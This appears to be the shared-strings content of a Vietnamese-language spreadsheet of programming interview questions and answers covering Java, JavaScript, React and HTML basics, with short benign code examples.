    <t>class Animal {
    void makeSound() {
        System.out.println("Some generic animal sound");
    }
}
class Dog extends Animal {
    @Override
    void makeSound() {
        System.out.println("Woof!");
    }
    void fetch() {
        System.out.println("Dog is fetching");
    }
}
Animal animal = new Dog() là upcasting, cho phép đối tượng Dog được tham chiếu bởi biến kiểu Animal.
Để truy cập phương thức fetch() của Dog, cần downcasting bằng (Dog) animal.
Toán tử instanceof được sử dụng để kiểm tra xem animal có thực sự là một Dog hay không, tránh lỗi ClassCastException.
Trong trường hợp genericAnimal, vì nó là đối tượng của Animal (không phải Dog), downcasting sẽ không được thực hiện.</t>
  </si>
  <si>
    <t>Câu trả lời bit,byte,char</t>
  </si>
  <si>
    <t>1 byte có thể biểu diễn các số nguyên nằm trong miền từ -128 tới 127. Một byte thường bao gồm 8 bit.</t>
  </si>
  <si>
    <t>Kiểu dữ liệu char thường có kích thước 1 byte (8 bit) và có phạm vi tương tự với số nguyên 8 bit có dấu hoặc không dấu. Phạm vi được đưa ra trong câu này lớn hơn nhiều so với khả năng của một char tiêu chuẩn.</t>
  </si>
  <si>
    <t>các môi trường chạy trong java</t>
  </si>
  <si>
    <t>bao nhiêu loại biến trong Java</t>
  </si>
  <si>
    <t>Biến dữ liệu là các biến dạng nào </t>
  </si>
  <si>
    <t>Trường dữ liệu</t>
  </si>
  <si>
    <t>khai báo biến lớp</t>
  </si>
  <si>
    <t>Có bao nhiêu kiểu dữ liệu cơ sở trong Java?</t>
  </si>
  <si>
    <t>Kiểu enum là gì</t>
  </si>
  <si>
    <t>JVM (Java Virtual Machine - Máy ảo Java) là gì ? Bạn không sử dụng trực tiếp JVM. Nó được tự động gọi và quản lý bởi JRE (hoặc JDK) khi bạn chạy một chương trình Java. Công việc của nó là dịch và thực thi bytecode.</t>
  </si>
  <si>
    <t>JVM là một máy ảo trừu tượng, là trái tim của Java, chịu trách nhiệm thực thi mã bytecode Java. Nó là một chương trình phần mềm giả lập một máy tính vật lý.Bạn sẽ không bao giờ "cài đặt" hay "chạy" JVM một cách trực tiếp như một ứng dụng độc lập. Nó là một phần của JRE hoặc JDK và hoạt động "ngầm" khi một chương trình Java được khởi chạy.</t>
  </si>
  <si>
    <t>public class ChaoBan { public static void main(String[] args) { System.out.println("Xin chào từ JVM!"); } }     Khi bạn biên dịch và chạy chương trình này:
Mã nguồn ChaoBan.java được biên dịch thành mã bytecode ChaoBan.class.
Khi bạn chạy java ChaoBan, JRE (hoặc JDK) sẽ khởi tạo một JVM instance.
JVM này sẽ tải file ChaoBan.class, kiểm tra tính hợp lệ của bytecode, và sau đó thực thi lệnh System.out.println("Xin chào từ JVM!");, hiển thị thông báo ra màn hình console.
Mỗi khi bạn chạy một ứng dụng Java, một JVM mới sẽ được tạo ra để thực thi ứng dụng đó.</t>
  </si>
  <si>
    <t>JRE (Java Runtime Environment - Môi trường chạy Java) là gì</t>
  </si>
  <si>
    <t>JRE là một gói phần mềm bao gồm JVM và các thư viện lớp Java cốt lõi (Java class libraries) cần thiết để chạy các ứng dụng Java.  Vai trò:
Cung cấp môi trường chạy: JRE cung cấp tất cả những gì cần thiết để một chương trình Java có thể chạy trên máy tính của người dùng cuối.
Kết hợp JVM và thư viện: Nó chứa JVM để thực thi bytecode và các thư viện Java chuẩn (như java.lang, java.util, java.io, v.v.) mà các chương trình Java thường sử dụng.Đặc điểm:
Có thể được cài đặt riêng biệt.
Dành cho người dùng cuối chỉ muốn chạy các ứng dụng Java, không cần phát triển.
Không bao gồm các công cụ phát triển như trình biên dịch, trình gỡ lỗi.
JRE = JVM + Thư viện Java cốt lõi.</t>
  </si>
  <si>
    <t>Cách sử dụng: Cài đặt JRE trên máy tính nếu bạn chỉ muốn chạy các ứng dụng Java đã được phát triển. Ví dụ, nếu bạn tải một game Java hoặc một phần mềm kế toán viết bằng Java, bạn chỉ cần JRE để chạy nó.
Lệnh: Khi bạn chạy một file .jar (file đóng gói ứng dụng Java) bằng cách nhấp đúp, JRE sẽ được sử dụng để khởi động JVM và chạy ứng dụng. Bạn cũng có thể dùng lệnh java YourApplication trong Command Prompt/Terminal để chạy file .class hoặc .jar (nếu đã được cấu hình Manifest).</t>
  </si>
  <si>
    <t>JRE là thứ mà người dùng cuối cần cài đặt trên máy tính của họ nếu họ muốn chạy các ứng dụng Java.
Ví dụ:
Bạn là một người dùng cuối: Một người bạn gửi cho bạn một trò chơi nhỏ được lập trình bằng Java dưới dạng file GameCuaBan.jar.
Để chơi game đó, bạn cần phải cài đặt JRE trên máy tính của mình.
Sau khi cài đặt JRE, bạn chỉ cần nhấp đúp vào file GameCuaBan.jar. JRE sẽ tự động khởi động JVM và cung cấp các thư viện cần thiết để trò chơi chạy được trên máy tính của bạn.
Nếu không có JRE, hệ điều hành của bạn sẽ không biết làm thế nào để mở và chạy file .jar đó.
Một trang web sử dụng applet Java (ít phổ biến ngày nay): Ngày xưa, nhiều trang web sử dụng Java Applet. Để xem các applet này, trình duyệt của bạn cần có JRE được cài đặt và cấu hình đúng.</t>
  </si>
  <si>
    <t>JDK (Java Development Kit - Bộ công cụ phát triển Java) là gì</t>
  </si>
  <si>
    <t>JDK là một bộ công cụ phát triển phần mềm toàn diện, cung cấp môi trường để phát triển, biên dịch, gỡ lỗi và chạy các ứng dụng Java.Vai trò:
Phát triển ứng dụng: JDK là lựa chọn bắt buộc cho các nhà phát triển Java. Nó bao gồm JRE và các công cụ phát triển quan trọng.
Biên dịch mã: Chứa javac (trình biên dịch Java), dùng để chuyển đổi mã nguồn Java (.java) thành mã bytecode (.class).
Gỡ lỗi: Chứa jdb (trình gỡ lỗi Java) để tìm và sửa lỗi trong ứng dụng.
Tạo tài liệu: Chứa javadoc để tạo tài liệu API từ mã nguồn.
Chạy ứng dụng: Vì JDK bao gồm JRE, nó cũng có khả năng chạy các ứng dụng Java.</t>
  </si>
  <si>
    <t>Đặc điểm:
Phải được cài đặt để phát triển ứng dụng Java.
JDK = JRE + Công cụ phát triển (javac, jdb, javadoc, v.v.).
Có thể cài đặt nhiều phiên bản JDK trên cùng một máy tính.</t>
  </si>
  <si>
    <t>JDK:
Cách sử dụng: Cài đặt JDK nếu bạn là một nhà phát triển Java.
Lệnh điển hình:
Biên dịch: javac TenFileCuaBan.java (sẽ tạo ra TenFileCuaBan.class)
Chạy: java TenFileCuaBan (sẽ thực thi file .class)
Gỡ lỗi: jdb TenFileCuaBan
Tạo Javadoc: javadoc TenFileCuaBan.java</t>
  </si>
  <si>
    <t>Phân biệt 3 loại : jvm,jre,jdk</t>
  </si>
  <si>
    <t xml:space="preserve">   -&gt;jvm : thông dịch cho code để chạy chương trình cho máy tính hiểu   -&gt; jre = jvm + libraries  -&gt; jdk = jre + developper tool</t>
  </si>
  <si>
    <t>ể hình dung dễ hơn, bạn có thể tưởng tượng mối quan hệ như sau:
JVM: Là "động cơ" bên trong, nơi mã Java thực sự được thực thi.
JRE: Là "bộ khung xe" (bao gồm động cơ và các bộ phận cần thiết khác) cho phép chiếc xe chạy. Người dùng cuối chỉ cần JRE để "lái xe" (chạy ứng dụng).
JDK: Là "nhà máy sản xuất ô tô" (bao gồm tất cả các công cụ, linh kiện, và cả bộ khung xe hoàn chỉnh) để tạo ra chiếc xe. Lập trình viên cần JDK để "xây dựng" ứng dụng.</t>
  </si>
  <si>
    <t>Bộ nhớ Stack và Heap là hai khu vực chính mà chương trình sử dụng để quản lý dữ liệu trong quá trình thực thi.   - Stack: Lý tưởng cho những dữ liệu tạm thời, lời gọi hàm, các biến primitive.
- Heap: Dành cho các đối tượng cần tồn tại lâu dài hoặc chia sẻ giữa nhiều hàm/phương thức.</t>
  </si>
  <si>
    <t>public class MemoryDemo {
    public static void main(String[] args) {
        // Biến nguyên thủy – nằm trong Stack
        int age = 30;
        // Biến tham chiếu – đối tượng tạo bằng 'new' – nằm trong Heap
        Person person = new Person("Lê");
        // Gọi phương thức – tạo ra Stack frame mới
        greet(person);
    }
    public static void greet(Person p) {
        String message = "Hello, " + p.name; // message nằm trong Stack, p tham chiếu đến đối tượng trong Heap
        System.out.println(message);
    }
}
class Person {
    String name;
    // Constructor – tạo đối tượng trong Heap
    public Person(String name) {
        this.name = name;
    }
}</t>
  </si>
  <si>
    <t>Java EE (Enterprise Edition)
Java EE (nay được gọi là Jakarta EE) là một tập hợp các API và tiêu chuẩn được xây dựng trên nền tảng Java SE. Nó được thiết kế để phát triển các ứng dụng doanh nghiệp lớn, phân tán, có khả năng mở rộng, và hoạt động trên server.</t>
  </si>
  <si>
    <t>Thành phần chính:
Server Applications: Các thành phần chạy trên máy chủ như Servlets và JSPs (JavaServer Pages), dùng để tạo ra các trang web động.
EJB (Enterprise JavaBeans): Các thành phần phức tạp để xử lý logic nghiệp vụ.
JMS (Java Message Service): API cho việc gửi và nhận tin nhắn giữa các ứng dụng.
JPA (Java Persistence API): API để quản lý dữ liệu trong cơ sở dữ liệu.
RESTful/SOAP Web Services: Các tiêu chuẩn để tạo ra các dịch vụ web.</t>
  </si>
  <si>
    <t>Tiêu chí</t>
  </si>
  <si>
    <t>Toán tử ==</t>
  </si>
  <si>
    <t>Phương thức equals()</t>
  </si>
  <si>
    <t>String s1 = new String("Gemini");
String s2 = new String("Gemini");
String s3 = s1;
// 1. Dùng toán tử ==
System.out.println(s1 == s2);  
// Kết quả: FALSE. 
// Lý do: Dùng từ khóa 'new', nên s1 và s2 được tạo ở 2 vùng nhớ hoàn toàn khác nhau.
System.out.println(s1 == s3);  
// Kết quả: TRUE. 
// Lý do: s3 được gán bằng s1, nên cả hai cùng trỏ vào một vùng nhớ.
// 2. Dùng phương thức equals()
System.out.println(s1.equals(s2)); 
// Kết quả: TRUE. 
// Lý do: Lớp String đã override equals() để so sánh từng ký tự. 
// Vì cả hai đều chứa chuỗi "Gemini" nên nội dung giống hệt nhau.</t>
  </si>
  <si>
    <t>Bản chất</t>
  </si>
  <si>
    <t>Toán tử toán học/logic</t>
  </si>
  <si>
    <t>Phương thức của lớp</t>
  </si>
  <si>
    <t>Mục đích chính</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF1F1F1F"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">So sánh </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF1F1F1F"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>địa chỉ bộ nhớ</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF1F1F1F"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> (tham chiếu) hoặc giá trị nguyên thủy.</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF1F1F1F"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">So sánh </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF1F1F1F"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>nội dung / trạng thái</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF1F1F1F"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> của đối tượng.</t>
    </r>
  </si>
  <si>
    <t>Khả năng ghi đè (Override)</t>
  </si>
  <si>
    <t>Không thể ghi đè. Hành vi là cố định.</t>
  </si>
  <si>
    <t>Có thể (và thường xuyên) được ghi đè bởi người lập trình.</t>
  </si>
  <si>
    <t>Tốc độ thực thi</t>
  </si>
  <si>
    <t>Nhanh hơn (chỉ so sánh một địa chỉ bộ nhớ).</t>
  </si>
  <si>
    <t>Chậm hơn một chút (do phải chạy logic kiểm tra từng thuộc tính bên trong).</t>
  </si>
  <si>
    <t>An toàn với Null</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF1F1F1F"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Có. </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF444746"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>obj == null</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF1F1F1F"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> hoạt động bình thường và trả về </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF444746"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>true</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF1F1F1F"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF444746"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>false</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF1F1F1F"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF1F1F1F"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Không an toàn. Nếu đối tượng gọi phương thức là null (vd: </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF444746"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>obj.equals(other)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF1F1F1F"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> mà </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF444746"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>obj</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF1F1F1F"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> là null) sẽ gây ra lỗi </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF444746"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>NullPointerException</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF1F1F1F"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <t>var – let – const so sánh</t>
  </si>
  <si>
    <t>. Scope (Phạm vi hoạt động)
Đây là sự khác biệt lớn nhất giữa "thế hệ cũ" (var) và "thế hệ mới" (let, const).
var (Function Scope): Nếu bạn khai báo var bên trong một hàm, nó chỉ có tác dụng trong hàm đó. Tuy nhiên, nếu khai báo trong các khối như if hay for, nó vẫn "lọt" ra ngoài.
let &amp; const (Block Scope): Biến chỉ tồn tại trong cặp ngoặc nhọn {} nơi nó được sinh ra. Điều này giúp tránh lỗi "râu ông nọ cắm cằm bà kia" rất hiệu quả.Ưu tiên dùng const cho mọi thứ. Nó giúp code của bạn an toàn và dễ đoán hơn.
Chỉ dùng let khi bạn chắc chắn rằng giá trị của biến đó cần phải thay đổi (ví dụ: biến đếm i trong vòng lặp for).
Hạn chế hoặc ngưng sử dụng var để tránh các vấn đề về phạm vi và lỗi logic không đáng có.</t>
  </si>
  <si>
    <t>2. Hoisting (Cơ chế đưa lên đầu)
Với var, bạn có thể gọi biến trước khi khai báo mà không bị lỗi (nó sẽ trả về undefined).
Với let và const, trình duyệt sẽ báo lỗi ReferenceError nếu bạn "cầm đèn chạy trước ô tô". Chúng thực tế vẫn được hoisting nhưng nằm trong vùng "tử thần" (Temporal Dead Zone) cho đến khi dòng khai báo được chạy tới.
3. Khai báo lại và Gán lại
var: Rất thoải mái, bạn có thể khai báo trùng tên biến nhiều lần mà không bị mắng. Nhưng đây cũng là nguồn cơn của nhiều bug khó tìm.
let: Cho phép đổi giá trị (như biến đếm trong vòng lặp) nhưng không cho phép khai báo lại cùng một tên trong cùng một scope.
const: Là "hằng số". Một khi đã gán giá trị là bạn không thể thay đổi nó.
Lưu ý nhỏ: Với const là Object hoặc Array, bạn vẫn có thể thay đổi nội dung bên trong (thêm phần tử, sửa thuộc tính), nhưng không thể gán nguyên một Object/Array mới vào biến đó.</t>
  </si>
  <si>
    <t>Regular Function (Hàm truyền thống): Là một "cỗ máy" độc lập. Khi nó được gọi, nó tự tạo ra một ngữ cảnh this riêng cho chính nó dựa trên cách nó được gọi. Nếu bạn gọi nó từ một object, this là object đó. Nếu bạn gọi nó như một hàm bình thường, this là window (hoặc undefined trong strict mode).
Arrow Function (Hàm mũi tên): Là một "kẻ mượn tạm". Nó không có ngữ cảnh this riêng. Nó "nhìn" ra bên ngoài xem hàm cha hoặc phạm vi bên ngoài đang dùng this là gì, thì nó dùng ké luôn cái đó. Người ta gọi đây là Lexical Scoping.</t>
  </si>
  <si>
    <t>const timer = {
  seconds: 0,
  start: function() {
    // Ở đây 'this' vẫn là đối tượng timer. Đúng!
    setInterval(function() {
      // Hàm này được gọi bởi trình duyệt (window), không phải timer.
      // Do đó, 'this' ở ĐÂY trở thành đối tượng Window hoặc undefined.
      this.seconds++; 
      console.log("Regular:", this.seconds); 
    }, 1000);
  }
};
timer.start(); // Kết quả: NaN, NaN, NaN... (vì window.seconds không tồn tại)Tại sao lỗi? Vì hàm bên trong setInterval là một hàm truyền thống, nó tự tạo this riêng của nó, và this đó không liên quan gì đến timer.</t>
  </si>
  <si>
    <t>Dùng Arrow Function (Chạy hoàn hảo)const timerArrow = {
  seconds: 0,
  start: function() {
    // 'this' ở đây là timer.
    setInterval(() =&gt; {
      // Arrow function không có 'this' riêng.
      // Nó mượn 'this' từ hàm start() bên ngoài.
      // Mà 'this' của start() chính là timer.
      this.seconds++; 
      console.log("Arrow:", this.seconds);
    }, 1000);
  }
};
timerArrow.start(); // Kết quả: 1, 2, 3... (Chạy đúng!)Tại sao đúng? Vì Arrow Function không "tự chế" ra this mới, nó giữ nguyên kết nối với đối tượng timer.</t>
  </si>
  <si>
    <t>Khi nào "Arrow Function" lại là lựa chọn sai?
Đừng lạm dụng Arrow Function cho mọi thứ. Có một trường hợp nó sẽ phản tác dụng: Định nghĩa Method cho Object.
JavaScriptconst user = {
  name: "Hoàng",
  // Dùng Arrow function ở đây là SAI
  sayHi: () =&gt; {
    console.log("Chào " + this.name);
  }
};
user.sayHi(); // Kết quả: "Chào undefined"Giải thích: Vì Arrow function mượn this từ phạm vi bên ngoài Object user (thường là window), mà window thì không có thuộc tính name là "Hoàng". Trong trường hợp này, bạn bắt buộc phải dùng Regular Function.</t>
  </si>
  <si>
    <t>Closure là gì?</t>
  </si>
  <si>
    <t>Nói một cách đơn giản nhất: Closure là một hàm có khả năng "nhớ" và truy cập vào các biến thuộc phạm vi (scope) của hàm cha, ngay cả khi hàm cha đó đã thực thi xong và đóng lại.
Hãy tưởng tượng Closure giống như một cái "balo" mà hàm con mang theo. Trong cái balo đó chứa tất cả những món đồ (biến số) mà nó lấy từ nhà (hàm cha) trước khi ra đi.</t>
  </si>
  <si>
    <t>function taoMayDem() {
  let count = 0; // Biến này nằm trong hàm cha
  return function() { 
    // Đây là hàm con (Closure)
    count++; 
    console.log(count);
  };
}const dem = taoMayDem(); 
dem(); // Kết quả: 1
dem(); // Kết quả: 2
dem(); // Kết quả: 3</t>
  </si>
  <si>
    <t>Event Loop là gì?</t>
  </si>
  <si>
    <t>JavaScript chỉ có thể làm một việc tại một thời điểm. Event Loop là cơ chế giúp JavaScript thực hiện các tác vụ bất đồng bộ (như gọi API, đọc file, set timer) mà không làm treo trình duyệt.</t>
  </si>
  <si>
    <t>1. Các thành phần chính của "Bộ máy"
Để hiểu Event Loop, bạn cần biết 4 bộ phận này phối hợp với nhau như thế nào:
Call Stack (Ngăn xếp tiếng gọi): Nơi chứa các hàm đang được thực thi. Hàm nào vào sau thì ra trước (LIFO). Khi một hàm chạy xong, nó bị đẩy ra khỏi Stack.
Web APIs: Đây là "trợ thủ" của trình duyệt (như setTimeout, fetch, DOM events). Khi gặp các tác vụ tốn thời gian, JavaScript sẽ đẩy sang đây để Web API làm hộ, còn anh đầu bếp (Call Stack) tiếp tục làm việc khác.
Callback Queue (Hàng đợi): Sau khi Web API làm xong (ví dụ: hết 2 giây timer), nó đẩy hàm callback vào đây để xếp hàng chờ.
Event Loop (Vòng lặp sự kiện): Đây là "ông cảnh sát giao thông". Nhiệm vụ duy nhất của nó là: Kiểm tra xem Call Stack có trống không? Nếu Stack trống, nó sẽ bốc hàm đầu tiên trong hàng đợi đẩy vào Stack để chạy.</t>
  </si>
  <si>
    <t>Virtual DOM là gì?</t>
  </si>
  <si>
    <t>Virtual DOM là bản sao DOM thật ở dạng JS object.
Khi state thay đổi:
React tạo Virtual DOM mới
So sánh với cái cũ (diffing)
Chỉ update phần thay đổi → nhanh hơn</t>
  </si>
  <si>
    <t>prop vs state</t>
  </si>
  <si>
    <t>Props	                                       State
Truyền từ cha xuống con          Nội bộ component
Read-only	                        Có thể thay đổi
Không tự thay đổi	         Dùng setState</t>
  </si>
  <si>
    <t>import React, { useState } from 'react';
// Component Con
function DongHo(props) {
  // 1. State: Số giây (tự thay đổi bên trong)
  const [seconds, setSeconds] = useState(0);
  const tangGiay = () =&gt; {
    setSeconds(seconds + 1);
  };
  return (
    &lt;div style={{ color: props.mauSac }}&gt; 
      {/* 2. Props: mauSac được truyền từ bên ngoài vào */}
      &lt;h1&gt;Màu của tôi là: {props.mauSac}&lt;/h1&gt;
      &lt;p&gt;Số giây hiện tại: {seconds}&lt;/p&gt;
      &lt;button onClick={tangGiay}&gt;Tăng giây&lt;/button&gt;
    &lt;/div&gt;
  );
}
// Component Cha
function App() {
  return (
    &lt;div&gt;
      {/* Cha truyền 'mauSac' xuống cho con thông qua Props */}
      &lt;DongHo mauSac="red" /&gt;
      &lt;DongHo mauSac="blue" /&gt;
    &lt;/div&gt;
  );
}</t>
  </si>
  <si>
    <t>Hãy xem một Component DongHo (Đồng hồ). Nó nhận "Màu sắc" từ cha (Props) nhưng tự quản lý "Số giây" của chính nó (State).  Phân tích ví dụ:
Props (mauSac): Khi App truyền màu đỏ, DongHo buộc phải hiển thị màu đỏ. Nó không thể tự đổi thành màu xanh. Nếu muốn đổi, App phải truyền một giá trị khác.
State (seconds): Mỗi khi bấm nút, seconds tăng lên. Đây là việc nội bộ của DongHo, App không cần biết và cũng không can thiệp vào.</t>
  </si>
  <si>
    <t>Khi nào component re-render?</t>
  </si>
  <si>
    <t>Tác nhân	Phạm vi ảnh hưởng
Thay đổi State	Chỉ component đó và các con của nó.
Thay đổi Props	Component nhận props đó và các con của nó.
Cha re-render	Toàn bộ cây con bên dưới (nếu không dùng memo).
Context thay đổi	Tất cả component đang "consume" context đó.</t>
  </si>
  <si>
    <t>Destructuring là gì?</t>
  </si>
  <si>
    <t>Destructuring (Phá vỡ cấu trúc) là một cú pháp giúp bạn "bóc tách" các giá trị từ Mảng (Array) hoặc các thuộc tính từ Đối tượng (Object) và gán chúng vào các biến riêng biệt một cách cực kỳ ngắn gọn.
Tưởng tượng: Bạn có một giỏ trái cây (Object). Thay vì mỗi lần muốn ăn phải thò tay vào giỏ lấy gioTraiCay.tao hay gioTraiCay.cam, bạn đổ luôn táo và cam ra đĩa (biến riêng) để dùng cho tiện.</t>
  </si>
  <si>
    <t>// Với Object
const user = { name: 'Alice', age: 25, city: 'Hà Nội' };
const { name, age } = user; // Bóc lấy name và age
console.log(name); // 'Alice'
// Với Array
const colors = ['Đỏ', 'Xanh', 'Vàng'];
const [firstColor, secondColor] = colors; // Lấy theo thứ tự
console.log(firstColor); // 'Đỏ'</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>Spread Operator dùng để làm gì? (</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
        <charset val="134"/>
      </rPr>
      <t>...</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>)</t>
    </r>
  </si>
  <si>
    <t>Spread Operator (Toán tử rải) cũng sử dụng dấu 3 chấm ..., có tác dụng "trải đều" hoặc "bung" các phần tử của một Mảng hoặc Đối tượng ra.
Công dụng chính:
Copy mảng/object (Shallow copy): Copy mà không bị dính tham chiếu (reference).
Gộp mảng/object: Nối nhiều mảng hoặc object lại với nhau.</t>
  </si>
  <si>
    <t>const arr1 = [1, 2];
const arr2 = [...arr1, 3, 4]; // Bung arr1 ra -&gt; [1, 2, 3, 4]
const user = { name: 'Bob' };
const updatedUser = { ...user, age: 30 }; // { name: 'Bob', age: 30 }</t>
  </si>
  <si>
    <t>Rest Parameter khác Spread như thế nào? (...)</t>
  </si>
  <si>
    <t>Đặc điểm	Spread Operator	Rest Parameter
Chức năng	"Bung ra" (Mở rộng từ 1 thành nhiều)	"Gom lại" (Gom nhiều phần lẻ tẻ thành 1 mảng)
Vị trí dùng	Khi khai báo biến mới, gộp mảng/object, hoặc truyền đối số vào hàm.	Nằm ở tham số của hàm (hoặc dùng kết hợp với destructuring để lấy phần còn lại).</t>
  </si>
  <si>
    <t>// Gom tất cả các tham số truyền vào thành một mảng tên là 'numbers'
function tinhTong(...numbers) {
  return numbers.reduce((total, num) =&gt; total + num, 0);
}
console.log(tinhTong(1, 2, 3, 4)); // Kết quả: 10</t>
  </si>
  <si>
    <t>Promise là gì?</t>
  </si>
  <si>
    <t>Promise (Lời hứa) là một đối tượng đại diện cho một tác vụ bất đồng bộ (chưa hoàn thành ngay lúc đó nhưng sẽ hoàn thành trong tương lai).
Tưởng tượng: Bạn vào quán order một cốc cafe. Thu ngân đưa cho bạn một tờ biên lai (Promise).
Lúc bạn đang cầm biên lai chờ đợi: Trạng thái là Pending (Đang chờ).
Lúc nhân viên gọi bạn ra lấy cafe: Trạng thái là Fulfilled / Resolved (Thành công - Lời hứa được thực hiện).
Lúc nhân viên ra xin lỗi vì máy pha cafe hỏng: Trạng thái là Rejected (Thất bại - Lời hứa bị phá vỡ).</t>
  </si>
  <si>
    <t>const callApi = new Promise((resolve, reject) =&gt; {
  let success = true;
  if (success) resolve("Lấy dữ liệu thành công!");
  else reject("Lỗi mạng!");
});
callApi
  .then(data =&gt; console.log(data)) // Chạy khi Resolved
  .catch(error =&gt; console.log(error)); // Chạy khi Rejected</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
        <charset val="134"/>
      </rPr>
      <t>async/await</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> hoạt động ra sao?</t>
    </r>
  </si>
  <si>
    <t>async/await thực chất là một "lớp vỏ bọc" (syntactic sugar) bên ngoài Promise. Nó giúp bạn viết code bất đồng bộ (chờ API, đọc file) mà nhìn trông giống y hệt như code đồng bộ chạy tuần tự từ trên xuống dưới.
async: Khai báo trước một hàm để biến hàm đó thành một hàm trả về Promise.
await: Chỉ được dùng bên trong hàm async. Nó ra lệnh cho JavaScript: "Hãy tạm dừng tại dòng này, chờ cái Promise này giải quyết xong (lấy được data về) thì mới chạy dòng tiếp theo".</t>
  </si>
  <si>
    <t>// Thay vì dùng .then().catch() dài dòng, ta dùng async/await:
async function layThongTinUser() {
  try {
    // Luồng chạy sẽ "tạm dừng" ở đây chờ API phản hồi
    const response = await fetch('https://api.example.com/user'); 
    // Phải chờ dòng trên xong thì mới chạy dòng dưới
    const data = await response.json(); 
    console.log(data);
  } catch (error) {
    // Tóm lỗi nếu API sập (tương đương với .catch() của Promise)
    console.log("Có lỗi xảy ra:", error);
  }
}</t>
  </si>
  <si>
    <t>cấu trúc 1 trang html gồm những gì nó ý nghĩa như thế nào</t>
  </si>
  <si>
    <t>Các thành phần và ý nghĩa
&lt;!DOCTYPE html&gt;: Khai báo đây là file HTML5. Giúp trình duyệt hiển thị đúng.
&lt;html&gt;: Thẻ cha bao ngoài cùng. Chứa toàn bộ nội dung trang.
&lt;head&gt; (Phần "não"): Chứa thông tin cấu hình (Metadata).
Ý nghĩa: Không hiển thị trên trang nhưng giúp trình duyệt hiểu tiêu đề (title), ngôn ngữ, Font chữ và kết nối CSS.
&lt;body&gt; (Phần "thân"): Chứa nội dung thực tế.
Ý nghĩa: Tất cả những gì người dùng thấy (chữ, hình ảnh, video, nút bấm) đều nằm ở đây.</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
    &lt;title&gt;Tiêu đề tab&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
    &lt;h1&gt;Nội dung chính&lt;/h1&gt;
    &lt;p&gt;Đoạn văn bản.&lt;/p&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>phân biệt class và id</t>
  </si>
  <si>
    <t>Dùng Class: Khi bạn muốn định nghĩa một "phong cách" (style) để áp dụng cho nhiều đối tượng khác nhau trên trang (ví dụ: tất cả các nút bấm, các đoạn văn bản chú thích).
